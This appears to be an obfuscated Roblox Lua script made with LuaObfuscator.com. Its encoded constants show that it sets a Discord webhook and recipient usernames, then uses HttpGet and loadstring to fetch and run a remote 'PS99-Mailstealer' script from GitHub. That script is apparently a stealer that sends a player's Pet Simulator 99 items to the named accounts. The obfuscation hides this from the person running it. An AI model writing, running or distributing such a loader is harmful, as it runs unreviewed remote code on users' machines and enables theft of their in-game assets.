--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.4) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v81=v2(v0(v30,16));if v19 then local v89=0;local v90;while true do if (v89==1) then return v90;end if (v89==0) then v90=v5(v81,v19);v19=nil;v89=1;end end else return v81;end end end);local function v20(v31,v32,v33) if v33 then local v82=(1270 -(226 + 1044)) -(0 -0) ;local v83;while true do if (v82==((117 -(32 + 85)) -0)) then v83=(v31/((3 -(1 + 0))^(v32-(2 -1))))%((621 -(555 + 15 + 49))^(((v33-(932 -(857 + 74))) -(v32-(569 -(367 + 201)))) + (928 -((1171 -(892 + 65)) + 713)))) ;return v83-(v83%(1 + 0)) ;end end else local v84=0 + 0 ;local v85;while true do if (v84==(877 -(282 + 595))) then v85=(1639 -(1523 + 114))^(v32-(1 + 0)) ;return (((v31%(v85 + v85))>=v85) and (1 -0)) or (1065 -(68 + 997)) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (4 -2) );v18=v18 + (3 -1) ;return (v36 * (469 -213)) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (353 -(87 + 263)) );v18=v18 + (184 -(67 + (449 -336))) ;return (v40 * (12302277 + 4474939)) + (v39 * (160901 -95365)) + (v38 * (189 + (1019 -(802 + 150)))) + v37 ;end local function v24() local v41=0 -0 ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==1) then v44=1 -0 ;v45=(v20(v43,1 + 0 ,(833 + 184) -(915 + (854 -(201 + 571))) ) * (2^(90 -58))) + v42 ;v41=2;end if (v41==(2 + 1)) then if (v46==(0 -(1138 -(116 + 1022)))) then if (v45==0) then return v47 * (1187 -(1069 + 118)) ;else local v101=0 -0 ;while true do if (v101==(0 -0)) then v46=1 + 0 ;v44=0 -0 ;break;end end end elseif (v46==(2031 + 16)) then return ((v45==(791 -(368 + 423))) and (v47 * ((4 -3)/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(1041 -(10 + 8)) ) * (v44 + (v45/((7 -5)^(494 -(416 + 26))))) ;end if (v41==(0 -0)) then v42=v23();v43=v23();v41=1 + 0 + 0 ;end if (v41==(3 -1)) then v46=v20(v43,459 -(145 + 293) ,31);v47=((v20(v43,116 -84 )==1) and  -(431 -(44 + 386))) or (1487 -(998 + 488)) ;v41=1 + 2 ;end end end local function v25(v48) local v49=0;local v50;local v51;while true do if (v49==(3 -(1082 -(1020 + 60)))) then v50=v3(v16,v18,(v18 + v48) -(860 -(814 + 45)) );v18=v18 + v48 ;v49=4 -2 ;end if (v49==2) then v51={};for v91=1 + 0 , #v50 do v51[v91]=v2(v1(v3(v50,v91,v91)));end v49=2 + 1 ;end if (v49==(888 -(261 + 624))) then return v6(v51);end if (v49==(0 -0)) then v50=nil;if  not v48 then v48=v23();if (v48==0) then return "";end end v49=1;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52==(889 -(117 + 771))) then v55=nil;v56=nil;v52=404 -(108 + 294) ;end if (v52~=2) then else v57=nil;v58=nil;v52=3;end if (v52==3) then v59=nil;v60=nil;v52=4;end if ((1493 -(570 + 919))~=v52) then else while true do if (v53==(1 -0)) then local v97=0;while true do if (v97~=1) then else v53=813 -(569 + 242) ;break;end if (v97==(0 -0)) then v56=nil;v57=nil;v97=1 + 0 ;end end end if (v53~=(1024 -(706 + 318))) then else local v98=0;while true do if (v98==0) then v54=1251 -(721 + 530) ;v55=nil;v98=1;end if (v98~=1) then else v53=1;break;end end end if (v53==(1273 -(945 + 326))) then local v99=0;local v100;while true do if (v99==0) then v100=0;while true do if (v100==(2 -1)) then v53=3 + 0 ;break;end if (v100~=0) then else local v136=0;while true do if (v136==(701 -(271 + 429))) then v100=1 + 0 ;break;end if (v136==(1500 -(1408 + 92))) then v58=nil;v59=nil;v136=1087 -(461 + 625) ;end end end end break;end end end if (3==v53) then v60=nil;while true do local v102=0;local v103;local v104;while true do if (v102==0) then v103=1288 -(993 + 295) ;v104=nil;v102=1;end if (v102==1) then while true do if (v103==(0 + 0)) then v104=1171 -(418 + 753) ;while true do if (v104==0) then local v154=0;local v155;while true do if (v154==0) then v155=0;while true do if (1==v155) then v104=1 + 0 ;break;end if (v155~=0) then else local v160=0 + 0 ;while true do if (v160==0) then if ((0 + 0)~=v54) then else local v162=0 + 0 ;local v163;local v164;while true do if ((529 -(406 + 123))==v162) then v163=1769 -(1749 + 20) ;v164=nil;v162=1 + 0 ;end if ((1323 -(1249 + 73))==v162) then while true do if (v163==(0 + 0)) then v164=0;while true do if (v164~=0) then else local v178=1145 -(466 + 679) ;while true do if (1~=v178) then else v164=2 -1 ;break;end if (v178==(0 -0)) then v55={};v56={};v178=1901 -(106 + 1794) ;end end end if (v164==2) then v54=1;break;end if (v164~=1) then else local v179=0 + 0 ;while true do if (v179==(1 + 0)) then v164=5 -3 ;break;end if (0~=v179) then else v57={};v58={v55,v56,nil,v57};v179=1428 -(41 + 1386) ;end end end end break;end end break;end end end if (v54==(104 -(17 + 86))) then local v165=0 + 0 ;while true do if (1==v165) then local v167=0 -0 ;local v168;while true do if ((0 -0)==v167) then v168=166 -(122 + 44) ;while true do if ((0 -0)==v168) then for v181=1,v59 do local v182=0 -0 ;local v183;local v184;local v185;local v186;local v187;while true do if (v182~=(1 + 0)) then else v185=nil;v186=nil;v182=1 + 1 ;end if ((0 -0)~=v182) then else v183=0;v184=nil;v182=66 -(30 + 35) ;end if ((2 + 0)~=v182) then else v187=nil;while true do if (v183==1) then local v194=0;while true do if (1~=v194) then else v183=1259 -(1043 + 214) ;break;end if (v194==0) then v186=nil;v187=nil;v194=1;end end end if ((7 -5)~=v183) then else while true do if (0==v184) then v185=0;v186=nil;v184=1213 -(323 + 889) ;end if (v184==(2 -1)) then v187=nil;while true do if (1==v185) then if (v186==(581 -(361 + 219))) then v187=v21()~=(320 -(53 + 267)) ;elseif (v186==2) then v187=v24();elseif (v186==3) then v187=v25();end v60[v181]=v187;break;end if (v185==0) then local v208=0;local v209;local v210;while true do if (v208==1) then while true do if (v209~=0) then else v210=0 + 0 ;while true do if (v210==(413 -(15 + 398))) then local v218=982 -(18 + 964) ;while true do if ((3 -2)==v218) then v210=1;break;end if ((0 + 0)==v218) then v186=v21();v187=nil;v218=1;end end end if (v210==1) then v185=1;break;end end break;end end break;end if (v208~=(0 + 0)) then else v209=850 -(20 + 830) ;v210=nil;v208=1 + 0 ;end end end end break;end end break;end if (v183~=(126 -(116 + 10))) then else local v195=0;while true do if (1~=v195) then else v183=1;break;end if (v195==(0 + 0)) then v184=738 -(542 + 196) ;v185=nil;v195=1;end end end end break;end end end v58[6 -3 ]=v21();v168=1;end if (v168~=(1 + 0)) then else v165=2;break;end end break;end end end if (v165==(0 + 0)) then local v169=0;while true do if (v169==(1 + 0)) then v165=1;break;end if (v169~=(0 -0)) then else v59=v23();v60={};v169=1;end end end if (v165==2) then v54=2;break;end end end v160=2 -1 ;end if (v160==1) then v155=1552 -(1126 + 425) ;break;end end end end break;end end end if (1==v104) then if ((407 -(118 + 287))==v54) then local v158=0 -0 ;local v159;while true do if (v158~=(1121 -(118 + 1003))) then else v159=0;while true do if (v159==0) then local v161=0;while true do if (v161==0) then local v166=0 -0 ;while true do if (v166==0) then for v170=378 -(142 + 235) ,v23() do local v171=0;local v172;local v173;local v174;while true do if (v171==(4 -3)) then v174=nil;while true do if (v172==(0 + 0)) then local v188=977 -(553 + 424) ;local v189;while true do if (v188==(0 -0)) then v189=0 + 0 ;while true do if (v189==0) then v173=0;v174=nil;v189=1 + 0 ;end if (v189~=(1 + 0)) then else v172=1;break;end end break;end end end if (v172~=(1 + 0)) then else while true do if (v173==(0 + 0)) then v174=v21();if (v20(v174,2 -1 ,1)==0) then local v190=0 -0 ;local v191;local v192;local v193;while true do if (v190~=(4 -2)) then else if (v20(v192,1,1 + 0 )==(4 -3)) then v193[755 -(239 + 514) ]=v60[v193[1 + 1 ]];end if (v20(v192,1331 -(797 + 532) ,2)==(1 + 0)) then v193[3]=v60[v193[3]];end v190=3;end if (v190~=1) then else v193={v22(),v22(),nil,nil};if (v191==0) then local v202=0 -0 ;local v203;local v204;while true do if (v202==1) then while true do if (0==v203) then v204=1202 -(373 + 829) ;while true do if (v204==0) then v193[3]=v22();v193[4]=v22();break;end end break;end end break;end if (v202==(731 -(476 + 255))) then v203=1130 -(369 + 761) ;v204=nil;v202=1;end end elseif (v191==(1 + 0)) then v193[5 -2 ]=v23();elseif (v191==(3 -1)) then v193[3]=v23() -(2^(254 -(64 + 174))) ;elseif (v191==(1 + 2)) then local v213=0 -0 ;while true do if (v213~=0) then else v193[339 -(144 + 192) ]=v23() -((218 -(42 + 174))^16) ;v193[4 + 0 ]=v22();break;end end end v190=2;end if (v190==(3 + 0)) then if (v20(v192,3,2 + 1 )~=(1505 -(363 + 1141))) then else v193[4]=v60[v193[4]];end v55[v170]=v193;break;end if (v190~=0) then else local v197=1580 -(1183 + 397) ;while true do if (v197==1) then v190=1;break;end if (v197==(0 -0)) then v191=v20(v174,2 + 0 ,3);v192=v20(v174,4,6);v197=1;end end end end end break;end end break;end end break;end if (v171~=(0 + 0)) then else local v177=1975 -(1913 + 62) ;while true do if (v177~=(0 + 0)) then else v172=0;v173=nil;v177=2 -1 ;end if (1==v177) then v171=1934 -(565 + 1368) ;break;end end end end end for v175=1,v23() do v56[v175-(3 -2) ]=v28();end v166=1662 -(1477 + 184) ;end if (v166==1) then v161=1;break;end end end if (v161~=1) then else v159=1;break;end end end if (1~=v159) then else return v58;end end break;end end end break;end end break;end end break;end end end break;end end break;end if (v52==0) then v53=0 -0 ;v54=nil;v52=1;end end end local function v29(v61,v62,v63) local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...) local v67=v64;local v68=v65;local v69=v66;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v86=0,v75 do if (v86>=v69) then v73[v86-v69 ]=v74[v86 + 1 ];else v77[v86]=v74[v86 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=9) then if (v80<=4) then if (v80<=1) then if (v80==0) then v77[v79[2]]=v79[3];else local v107=0;local v108;local v109;local v110;local v111;while true do if (v107==0) then v108=v79[2];v109,v110=v70(v77[v108](v13(v77,v108 + 1 ,v79[3])));v107=1;end if (v107==1) then v72=(v110 + v108) -1 ;v111=0;v107=2;end if (v107==2) then for v150=v108,v72 do local v151=0;while true do if (v151==0) then v111=v111 + 1 ;v77[v150]=v109[v111];break;end end end break;end end end elseif (v80<=2) then v77[v79[2]]=v79[3];elseif (v80==3) then v77[v79[2]]=v63[v79[3]];else v77[v79[2]]=v63[v79[3]];end elseif (v80<=6) then if (v80==5) then local v114=v79[2];v77[v114]=v77[v114](v13(v77,v114 + 1 ,v72));else v63[v79[3]]=v77[v79[2]];end elseif (v80<=7) then v77[v79[2]]();elseif (v80>8) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end else local v141=v79[2];v77[v141]=v77[v141](v13(v77,v141 + 1 ,v72));end elseif (v80<=14) then if (v80<=11) then if (v80>10) then local v118=v79[2];local v119=v77[v79[3]];v77[v118 + 1 ]=v119;v77[v118]=v119[v79[4]];else v63[v79[3]]=v77[v79[2]];end elseif (v80<=12) then v71=v79[3];elseif (v80==13) then v71=v79[3];else v77[v79[2]]();end elseif (v80<=16) then if (v80==15) then local v126=v79[2];local v127,v128=v70(v77[v126](v13(v77,v126 + 1 ,v79[3])));v72=(v128 + v126) -1 ;local v129=0;for v133=v126,v72 do v129=v129 + 1 ;v77[v133]=v127[v129];end else local v130=0;local v131;local v132;while true do if (1==v130) then v77[v131 + 1 ]=v132;v77[v131]=v132[v79[4]];break;end if (v130==0) then v131=v79[2];v132=v77[v79[3]];v130=1;end end end elseif (v80<=17) then do return;end elseif (v80>18) then if (v77[v79[2]]==v79[4]) then v71=v71 + 1 ;else v71=v79[3];end else do return;end end v71=v71 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0C3O00028O00026O00F03F03073O00576562682O6F6B03213O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403543O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C79706865725363726970742F50532O392D4D61696C737465616C65722F6D61696E2F50532O394D61696C737465616C657203083O00557365726E616D6503093O004C79706865725F313703093O00557365726E616D653203083O004C79706865725F3100163O00124O00013O0026133O000D0001000200040D3O000D000100122O000100043O001206000100033O001203000100053O001203000200063O00200B00020002000700122O000400084O000F000200044O000500013O00022O000E00010001000100040D3O001500010026133O00010001000100040D3O0001000100122O0001000A3O001206000100093O00122O0001000C3O0012060001000B3O00124O00023O00040D3O000100012O00123O00017O00",v9(),...);
